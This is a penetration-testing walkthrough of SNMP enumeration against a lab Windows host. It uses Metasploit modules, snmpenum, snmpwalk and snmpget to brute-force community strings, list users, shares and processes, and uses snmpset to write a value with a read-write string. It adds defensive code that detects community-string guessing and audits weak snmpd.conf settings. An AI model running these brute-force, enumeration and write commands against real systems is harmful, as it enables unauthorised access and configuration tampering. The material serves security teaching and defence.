Metasploit has a number of auxiliary modules to help in enumerating SNMP on target host(s).
msf > search snmp
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/snmp/aix_version normal AIX SNMP Scanner Auxiliary Module
auxiliary/scanner/snmp/cisco_config_tftp normal Cisco IOS SNMP Configuration Grabber (TFTP)
auxiliary/scanner/snmp/cisco_upload_file normal Cisco IOS SNMP File Upload (TFTP)
auxiliary/scanner/snmp/snmp_enum normal SNMP Enumeration Module
auxiliary/scanner/snmp/snmp_enumshares normal SNMP Windows SMB Share Enumeration
auxiliary/scanner/snmp/snmp_enumusers normal SNMP Windows Username Enumeration
auxiliary/scanner/snmp/snmp_login normal SNMP Community Scanner
auxiliary/scanner/snmp/snmp_set normal SNMP Set Module
...snip...
We can start by brute-forcing the SNMP service to identify valid community strings.
msf auxiliary(snmp_enum) > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(snmp_login) > show options
Module options (auxiliary/scanner/snmp/snmp_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to probe in each set
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
CHOST 172.72.5.1 no The local client address
PASSWORD no The password to test
PASS_FILE /opt/metasploit_open/msf3/data/wordlists/snmp_default_pass.txt no File containing communities, one per line
RHOSTS 172.72.5.141 yes The target address range or CIDR identifier
RPORT 161 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USER_AS_PASS true no Try the username as the password for all users
VERBOSE true yes Whether to print output for all attempts
msf auxiliary(snmp_login) > run
[*] 172.72.5.141:161 - SNMP - Trying public...
[+] SNMP: 172.72.5.141 community string: 'public' info: 'Hardware: x86 Family 6 Model 15 Stepping 11 AT/AT COMPATIBLE - Software: Windows 2000 Version 5.1 (Build 2600 Uniprocessor Free)'
[*] 172.72.5.141:161 - SNMP - Trying private...
...snip...
[*] Validating scan results from 1 hosts...
[*] Host 172.72.5.141 provides READ-WRITE access with community 'admin'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
We found two community strings: the default 'public' and a non-default 'admin'. 'public' is a read-only string, while 'admin' has read-write privileges.
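The defender's view of the scan above: snmp_login cycles through a wordlist of community strings against one host, so the signature on the wire is a single source presenting many distinct community strings. The example below is added here and is not part of the original post; it parses the version and community field out of raw SNMPv1/v2c datagrams (the first two BER fields of the message) and flags sources that exceed a threshold. The packets it runs on are constructed with the build_get helper, and the 172.72.5.1 / 10.0.0.5 addresses in the lead-in and tests are sample values.

```python
from collections import defaultdict

def _ber_len(buf, i):
    """Decode the BER length at buf[i]; return (length, index_after)."""
    first = buf[i]
    if first < 0x80:
        return first, i + 1
    n = first & 0x7F
    return int.from_bytes(buf[i + 1:i + 1 + n], "big"), i + 1 + n

def parse_snmp_header(pkt):
    """Return (version, community) from an SNMPv1/v2c datagram, or None
    for anything that is not a community-based message (e.g. SNMPv3)."""
    try:
        if pkt[0] != 0x30:                      # outer SEQUENCE
            return None
        _, i = _ber_len(pkt, 1)
        if pkt[i] != 0x02:                      # INTEGER version
            return None
        ln, i = _ber_len(pkt, i + 1)
        version = int.from_bytes(pkt[i:i + ln], "big")
        i += ln
        if version not in (0, 1) or pkt[i] != 0x04:  # v1=0, v2c=1; OCTET STRING community
            return None
        ln, i = _ber_len(pkt, i + 1)
        return version, pkt[i:i + ln].decode("latin-1")
    except IndexError:                          # truncated datagram
        return None

def build_get(community, version=1):
    """Constructed test data: a minimal GetRequest for sysDescr.0 (all lengths < 128)."""
    oid = bytes([0x06, 0x08, 0x2B, 0x06, 0x01, 0x02, 0x01, 0x01, 0x01, 0x00])
    varbind = b"\x30" + bytes([len(oid) + 2]) + oid + b"\x05\x00"   # OID, NULL value
    vbl = b"\x30" + bytes([len(varbind)]) + varbind
    pdu_body = b"\x02\x01\x01\x02\x01\x00\x02\x01\x00" + vbl          # req-id 1, err 0, idx 0
    pdu = b"\xA0" + bytes([len(pdu_body)]) + pdu_body                 # GetRequest-PDU
    comm = community.encode()
    body = b"\x02\x01" + bytes([version]) + b"\x04" + bytes([len(comm)]) + comm + pdu
    return b"\x30" + bytes([len(body)]) + body

def find_guessers(datagrams, threshold=5):
    """datagrams: iterable of (src_ip, udp_payload). Return {src: [communities]}
    for sources that presented at least `threshold` distinct community strings,
    the signature of a wordlist-driven scanner such as snmp_login."""
    seen = defaultdict(set)
    for src, payload in datagrams:
        hdr = parse_snmp_header(payload)
        if hdr:
            seen[src].add(hdr[1])
    return {s: sorted(c) for s, c in seen.items() if len(c) >= threshold}
```

Feed it the UDP payloads of port 161 traffic from a capture; a legitimate poller uses one community string per host, so a source with five or more distinct strings is worth an alert.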
With this info, we can now go ahead and enumerate user accounts present on the target.
msf > info auxiliary/scanner/snmp/snmp_enumusers
Name: SNMP Windows Username Enumeration
Module: auxiliary/scanner/snmp/snmp_enumusers
Version: 12107
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
tebo <tebo@attackresearch.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
COMMUNITY public yes SNMP Community String
RETRIES 1 yes SNMP Retries
RHOSTS 172.72.5.141 yes The target address range or CIDR identifier
RPORT 161 yes The target port
THREADS 1 yes The number of concurrent threads
TIMEOUT 1 yes SNMP Timeout
VERSION 1 yes SNMP Version <1/2c>
Description:
This module will use LanManager OID values to enumerate local user
accounts on a Windows system via SNMP
msf > use auxiliary/scanner/snmp/snmp_enumusers
msf auxiliary(snmp_enumusers) > run
[+] 172.72.5.141 Found Users: Administrator, Guest, HelpAssistant, IUSR_PLAYGROUND1, IWAM_PLAYGROUND1, SUPPORT_388945a0, playground
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
We can also enumerate any open shares on the target using the snmp_enumshares module.
msf > info auxiliary/scanner/snmp/snmp_enumshares
Name: SNMP Windows SMB Share Enumeration
Module: auxiliary/scanner/snmp/snmp_enumshares
Version: 11707
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
tebo <tebo@attackresearch.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
COMMUNITY public yes SNMP Community String
RETRIES 1 yes SNMP Retries
RHOSTS 172.72.5.141 yes The target address range or CIDR identifier
RPORT 161 yes The target port
THREADS 1 yes The number of concurrent threads
TIMEOUT 1 yes SNMP Timeout
VERSION 1 yes SNMP Version <1/2c>
Description:
This module will use LanManager OID values to enumerate SMB shares
on a Windows system via SNMP
msf > use auxiliary/scanner/snmp/snmp_enumshares
msf auxiliary(snmp_enumshares) > run
[+] 172.72.5.141
Python27 - (C:\Python27)
Shared_field - (C:\Shared_field)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
To gather more information over SNMP, we can use 'snmpenum'. This handy script uses the community strings we identified earlier to collect target system information. We need to give it the target host IP, the community string, and the platform definition file (windows.txt for a Windows target).
root@bt:/pentest/enumeration/snmpenum# ./snmpenum.pl 172.72.5.141 public windows.txt
----------------------------------------
INSTALLED SOFTWARE
----------------------------------------
Adobe Flash Player 10 ActiveX
FileZilla Client 3.3.5.1
FileZilla Server (remove only)
0xb5546f7272656e74
WinRAR archiver
Java(TM) 6 Update 25
Python 2.7.1
Java(TM) SE Development Kit 6 Update 25
WebFldrs XP
...snip...
----------------------------------------
UPTIME
----------------------------------------
53 minutes, 33.31
----------------------------------------
HOSTNAME
----------------------------------------
PLAYGROUND1
----------------------------------------
USERS
----------------------------------------
Guest
playground
Administrator
HelpAssistant
IUSR_PLAYGROUND1
IWAM_PLAYGROUND1
SUPPORT_388945a0
----------------------------------------
DISKS
----------------------------------------
A:\
C:\ Label: Serial Number
D:\ Label:GRTMPVOL_EN
Virtual Memory
Physical Memory
----------------------------------------
RUNNING PROCESSES
----------------------------------------
System Idle Process
System
wuauclt.exe
ctfmon.exe
...snip...
VMUpgradeHelper.exe
VMwareUser.exe
logonui.exe
snmptrap.exe
----------------------------------------
LISTENING UDP PORTS
----------------------------------------
161
162
445
500
1032
1039
1045
3456
3527
4500
----------------------------------------
SYSTEM INFO
----------------------------------------
Hardware: x86 Family 6 Model 15 Stepping 11 AT/AT COMPATIBLE - Software: Windows 2000 Version 5.1 (Build 2600 Uniprocessor Free)
----------------------------------------
SHARES
----------------------------------------
Python27
Shared_field
C:\Python27
C:\Shared_field
----------------------------------------
LISTENING TCP PORTS
----------------------------------------
25
80
135
443
445
1040
1042
1801
2103
2105
2107
----------------------------------------
SERVICES
----------------------------------------
Server
Themes
Event Log
IIS Admin
...snip...
Background Intelligent Transfer Service
----------------------------------------
DOMAIN
----------------------------------------
WORKGROUP
Another cool SNMP enumeration tool is 'snmpwalk'. We can use it to query the target for system information.
snmpwalk -v 2c -c public 172.72.5.141 | more
SNMPv2-MIB::sysDescr.0 = STRING: Hardware: x86 Family 6 Model 15 Stepping 11 AT/AT COMPATIBLE - Software: Windows 2000 Version 5.1 (Build 2600 Uniprocessor Free)
SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.311.1.1.3.1.1
DISMAN-EVENT-MIB::sysUpTimeInstance = Timeticks: (96709) 0:16:07.09
SNMPv2-MIB::sysContact.0 = STRING: Target@playground.mil
SNMPv2-MIB::sysName.0 = STRING: PLAYGROUND1
SNMPv2-MIB::sysLocation.0 = STRING: Playground
SNMPv2-MIB::sysServices.0 = INTEGER: 76
IF-MIB::ifNumber.0 = INTEGER: 3
IF-MIB::ifIndex.1 = INTEGER: 1
IF-MIB::ifIndex.2 = INTEGER: 2
IF-MIB::ifIndex.65540 = INTEGER: 65540
IF-MIB::ifDescr.1 = STRING: MS TCP Loopback interface
IF-MIB::ifDescr.2 = STRING: AMD PCNET Family PCI Ethernet Adapter #2 - Packet Scheduler Miniport
IF-MIB::ifDescr.65540 = STRING: AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
IF-MIB::ifType.1 = INTEGER: softwareLoopback(24)
IF-MIB::ifType.2 = INTEGER: ethernetCsmacd(6)
IF-MIB::ifType.65540 = INTEGER: ethernetCsmacd(6)
IF-MIB::ifMtu.1 = INTEGER: 1520
IF-MIB::ifMtu.2 = INTEGER: 1500
IF-MIB::ifMtu.65540 = INTEGER: 1500
IF-MIB::ifSpeed.1 = Gauge32: 10000000
IF-MIB::ifSpeed.2 = Gauge32: 1000000000
...snip...
After this, we can use 'snmpget' to collect the value of a specific OID.
Say we want to query the value of OID 'sysLocation.0'.
snmpget -v 2c -c public 172.72.5.141 sysLocation.0
--> SNMPv2-MIB::sysLocation.0 = STRING: Playground
Cool, we see it has returned the currently configured value.
Remember that we also have a read-write community string, 'admin'. With a RW string, the target's configuration can be modified as well as read; an attacker will use it to read or alter a router's running-config, for example.
snmpset, as the name implies, can set OID values if we have the RW SNMP string.
The command below uses the RW string 'admin' to change the value of OID sysLocation.0, a string value (hence the 's' type option), from Playground to NewPlayground.
snmpset -v 2c -c admin 172.72.5.141 sysLocation.0 s NewPlayground
--> SNMPv2-MIB::sysLocation.0 = STRING: NewPlayground
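Every finding in this walkthrough traces back to the agent's configuration: a default community, a read-write community, and no source restriction, all over cleartext v2c. The following audit script is added here and is not from the original post; it assumes a net-snmp style snmpd.conf (the Windows SNMP service configures the same settings through the registry instead), and both config snippets it checks are constructed. The hardened snippet shows the replacement: SNMPv3 with authPriv, read-only, confined to the system subtree.

```python
import re

# Community names that appear in default wordlists such as Metasploit's
# snmp_default_pass.txt (short constructed subset for this example).
WEAK_COMMUNITIES = {"public", "private", "admin", "manager", "cisco", "snmp"}

# Constructed: a v2c configuration that yields exactly the findings above.
WEAK_CONF = """\
rocommunity public
rwcommunity admin
"""

# Constructed: SNMPv3 only, authPriv, read-only, confined to the system subtree.
HARDENED_CONF = """\
createUser monitor SHA REPLACE_WITH_AUTH_PASSPHRASE AES REPLACE_WITH_PRIV_PASSPHRASE
rouser monitor priv -V systemonly
view systemonly included .1.3.6.1.2.1.1
"""

# rocommunity|rwcommunity[6] NAME [SOURCE [OID | -V VIEW]]
COMMUNITY_RE = re.compile(r"^\s*(ro|rw)community6?\s+(\S+)(?:\s+(\S+))?", re.I)

def audit_snmpd_conf(text):
    """Return a list of (severity, message) for each weakness found."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = COMMUNITY_RE.match(line.split("#", 1)[0])   # ignore trailing comments
        if not m:
            continue
        access, name, source = m.group(1).lower(), m.group(2), m.group(3)
        if access == "rw":
            findings.append(("high", f"line {lineno}: read-write community '{name}' permits SNMP SET"))
        if name.lower() in WEAK_COMMUNITIES:
            findings.append(("high", f"line {lineno}: community '{name}' is in common wordlists"))
        if source is None or source.lower() == "default":
            findings.append(("medium", f"line {lineno}: community '{name}' accepted from any source"))
        findings.append(("low", f"line {lineno}: v1/v2c community '{name}' travels in cleartext; use SNMPv3"))
    return findings

def severity_counts(findings):
    """Summarise findings as {severity: count}."""
    counts = {}
    for sev, _ in findings:
        counts[sev] = counts.get(sev, 0) + 1
    return counts
```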